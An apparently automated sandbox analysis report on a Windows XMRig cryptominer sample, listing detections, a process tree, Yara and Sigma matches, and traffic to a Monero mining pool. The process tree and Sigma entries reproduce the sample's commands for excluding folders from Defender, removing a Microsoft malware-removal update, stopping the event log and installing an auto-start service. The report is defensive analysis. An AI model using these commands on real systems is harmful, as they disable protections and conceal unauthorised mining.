
Windows Analysis Report
rtYpMDeKUq.exe

Overview

General Information

Sample name: rtYpMDeKUq.exe (renamed because the original name is a hash value)
Original sample name: 3829cf00079dd383532ac6637444081a9752f77d186dbdcbafcc44ddde0d9cf3.exe
Analysis ID: 1556039
MD5: 9b1749c1bb9e8a354404b8a57de68ec6
SHA1: 4c8838d22efc926551be0e77ecd1e6a68e15f6c4
SHA256: 3829cf00079dd383532ac6637444081a9752f77d186dbdcbafcc44ddde0d9cf3
Tags: exe, user-Chainskilabs

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
DNS related to crypt mining pools
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • rtYpMDeKUq.exe (PID: 6936 cmdline: "C:\Users\user\Desktop\rtYpMDeKUq.exe" MD5: 9B1749C1BB9E8A354404B8A57DE68EC6)
    • powershell.exe (PID: 2796 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5848 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 6208 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 2044 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5888 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6848 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5236 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2708 cmdline: C:\Windows\system32\sc.exe delete "TASJBGYW" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3160 cmdline: C:\Windows\system32\sc.exe create "TASJBGYW" binpath= "C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6208 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5784 cmdline: C:\Windows\system32\sc.exe start "TASJBGYW" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • lzsbffridksl.exe (PID: 7148 cmdline: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe MD5: 9B1749C1BB9E8A354404B8A57DE68EC6)
    • powershell.exe (PID: 3800 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6528 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 4444 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 6696 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6848 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5072 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4352 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 5820 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svchost.exe (PID: 5588 cmdline: svchost.exe MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source | Rule | Description | Author | Strings
00000026.00000003.1561494996.0000020A9D054000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
00000026.00000003.1551425643.0000020A9D06B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
00000026.00000002.2736886046.0000020A9D080000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
00000026.00000002.2736802708.0000020A9D02F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
00000026.00000002.2736858015.0000020A9D06B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
(4 further entries not shown)
Source | Rule | Description | Author | Strings
38.2.svchost.exe.140000000.0.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
38.2.svchost.exe.140000000.0.unpack | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown |
  • 0x370008:$a1: mining.set_target
  • 0x362230:$a2: XMRIG_HOSTNAME
  • 0x364ba8:$a3: Usage: xmrig [OPTIONS]
  • 0x362208:$a4: XMRIG_VERSION
38.2.svchost.exe.140000000.0.unpack | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth |
  • 0x3b5761:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
38.2.svchost.exe.140000000.0.unpack | MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen |
  • 0x3b5fd8:$s1: %s/%s (Windows NT %lu.%lu
  • 0x3b9600:$s3: \\.\WinRing0_
  • 0x3671a8:$s4: pool_wallet
  • 0x3615d8:$s5: cryptonight
  • 0x3615e8:$s5: cryptonight
  • 0x3615f8:$s5: cryptonight
  • 0x361608:$s5: cryptonight
  • 0x361620:$s5: cryptonight
  • 0x361630:$s5: cryptonight
  • 0x361640:$s5: cryptonight
  • 0x361658:$s5: cryptonight
  • 0x361668:$s5: cryptonight
  • 0x361680:$s5: cryptonight
  • 0x361698:$s5: cryptonight
  • 0x3616a8:$s5: cryptonight
  • 0x3616b8:$s5: cryptonight
  • 0x3616c8:$s5: cryptonight
  • 0x3616e0:$s5: cryptonight
  • 0x3616f8:$s5: cryptonight
  • 0x361708:$s5: cryptonight
  • 0x361718:$s5: cryptonight

Change of critical system settings

Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\rtYpMDeKUq.exe", ParentImage: C:\Users\user\Desktop\rtYpMDeKUq.exe, ParentProcessId: 6936, ParentProcessName: rtYpMDeKUq.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 2044, ProcessName: powercfg.exe

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rtYpMDeKUq.exe", ParentImage: C:\Users\user\Desktop\rtYpMDeKUq.exe, ParentProcessId: 6936, ParentProcessName: rtYpMDeKUq.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 2796, ProcessName: powershell.exe
Source: Process started; Author: David Burkett, @signalblur; Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe, ParentImage: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe, ParentProcessId: 7148, ParentProcessName: lzsbffridksl.exe, ProcessCommandLine: svchost.exe, ProcessId: 5588, ProcessName: svchost.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rtYpMDeKUq.exe", ParentImage: C:\Users\user\Desktop\rtYpMDeKUq.exe, ParentProcessId: 6936, ParentProcessName: rtYpMDeKUq.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 2796, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe, ParentImage: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe, ParentProcessId: 7148, ParentProcessName: lzsbffridksl.exe, ProcessCommandLine: svchost.exe, ProcessId: 5588, ProcessName: svchost.exe
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: C:\Windows\system32\sc.exe create "TASJBGYW" binpath= "C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "TASJBGYW" binpath= "C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\rtYpMDeKUq.exe", ParentImage: C:\Users\user\Desktop\rtYpMDeKUq.exe, ParentProcessId: 6936, ParentProcessName: rtYpMDeKUq.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "TASJBGYW" binpath= "C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe" start= "auto", ProcessId: 3160, ProcessName: sc.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rtYpMDeKUq.exe", ParentImage: C:\Users\user\Desktop\rtYpMDeKUq.exe, ParentProcessId: 6936, ParentProcessName: rtYpMDeKUq.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 2796, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe, ParentImage: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe, ParentProcessId: 7148, ParentProcessName: lzsbffridksl.exe, ProcessCommandLine: svchost.exe, ProcessId: 5588, ProcessName: svchost.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\rtYpMDeKUq.exe", ParentImage: C:\Users\user\Desktop\rtYpMDeKUq.exe, ParentProcessId: 6936, ParentProcessName: rtYpMDeKUq.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 6208, ProcessName: sc.exe
No Suricata rule has matched

AV Detection

Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe; ReversingLabs: Detection: 65%
Source: rtYpMDeKUq.exe; ReversingLabs: Detection: 65%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.7% probability

Bitcoin Miner

Source: Yara match; File source: 38.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000026.00000003.1561494996.0000020A9D054000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000026.00000003.1551425643.0000020A9D06B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000026.00000002.2736886046.0000020A9D080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000026.00000002.2736802708.0000020A9D02F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000026.00000002.2736858015.0000020A9D06B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000026.00000002.2735503667.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: svchost.exe PID: 5588, type: MEMORYSTR
Source: unknown; DNS query: name: xmr-eu1.nanopool.org
Source: svchost.exe, 00000026.00000002.2735503667.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: stratum+tcp://
Source: svchost.exe; String found in binary or memory: cryptonight/0
Source: svchost.exe, 00000026.00000002.2735503667.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: -o, --url=URL URL of mining server
Source: svchost.exe, 00000026.00000002.2735503667.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: Usage: xmrig [OPTIONS]
Source: rtYpMDeKUq.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: lzsbffridksl.exe, 00000018.00000003.1549735249.000001C978BA0000.00000004.00000001.00020000.00000000.sdmp
Source: global traffic; TCP traffic: 192.168.2.8:49704 -> 54.37.232.103:10343
Source: Joe Sandbox View; IP Address: 54.37.232.103
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: xmr-eu1.nanopool.org
Source: svchost.exe, 00000026.00000002.2736886046.0000020A9D080000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2736952891.0000020A9D0A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2736858015.0000020A9D06B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
Source: svchost.exe, 00000026.00000002.2736886046.0000020A9D080000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
Source: lzsbffridksl.exe, 00000018.00000003.1549735249.000001C978BA0000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: lzsbffridksl.exe, 00000018.00000003.1549735249.000001C978BA0000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: lzsbffridksl.exe, 00000018.00000003.1549735249.000001C978BA0000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: lzsbffridksl.exe, 00000018.00000003.1549735249.000001C978BA0000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: svchost.exe, 00000026.00000002.2736952891.0000020A9D0A6000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.cloudflare.com/origin_ca
Source: svchost.exe, 00000026.00000002.2736886046.0000020A9D080000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2736858015.0000020A9D06B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.cloudflare.com/origin_ca0
Source: svchost.exe, 00000026.00000002.2735503667.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: https://xmrig.com/docs/algorithms

System Summary

Source: 38.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE; Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 38.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 38.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE; Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000026.00000002.2735503667.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY; Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: svchost.exe PID: 5588, type: MEMORYSTR; Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Users\user\Desktop\rtYpMDeKUq.exe; Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\rtYpMDeKUq.exe; Code function: 0_2_00007FF75E8E1394 NtOpenFile
Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe; Code function: 24_2_00007FF6CD201394 NtAllocateVirtualMemory
Source: C:\Windows\System32\conhost.exe; Code function: 35_2_0000000140001394 NtRecoverResourceManager
Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe; File created: C:\Windows\TEMP\jvocdauqvwbp.sys
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File deleted: C:\Windows\Temp\__PSScriptPolicyTest_lp2ylgtl.uzo.ps1
Source: C:\Users\user\Desktop\rtYpMDeKUq.exe; Code function: 0_2_00007FF75E8E3B50
Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe; Code function: 24_2_00007FF6CD203B50
Source: C:\Windows\System32\conhost.exe; Code function: 35_2_0000000140003150
Source: C:\Windows\System32\conhost.exe; Code function: 35_2_00000001400026E0
Source: Joe Sandbox View; Dropped File: C:\Windows\Temp\jvocdauqvwbp.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe; Code function: String function: 00007FF6CD201394 appears 33 times
Source: C:\Users\user\Desktop\rtYpMDeKUq.exe; Code function: String function: 00007FF75E8E1394 appears 33 times
Source: 38.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE; Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 38.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 38.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000026.00000002.2735503667.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY; Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: svchost.exe PID: 5588, type: MEMORYSTR; Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: classification engine; Classification label: mal100.spyw.evad.mine.winEXE@56/12@1/1
Source: C:\Windows\System32\conhost.exe; Mutant created: \BaseNamedObjects\Local\SM0:7144:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Mutant created: NULL
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2456:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5444:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \BaseNamedObjects\Local\SM0:5620:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \BaseNamedObjects\Local\SM0:5012:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1888:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \BaseNamedObjects\Local\SM0:4820:120:WilError_03
Source: C:\Windows\System32\svchost.exe; Mutant created: \BaseNamedObjects\Global\qpwmktkikrnkqdxl
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \BaseNamedObjects\Local\SM0:4840:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \BaseNamedObjects\Local\SM0:6936:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5168:120:WilError_03
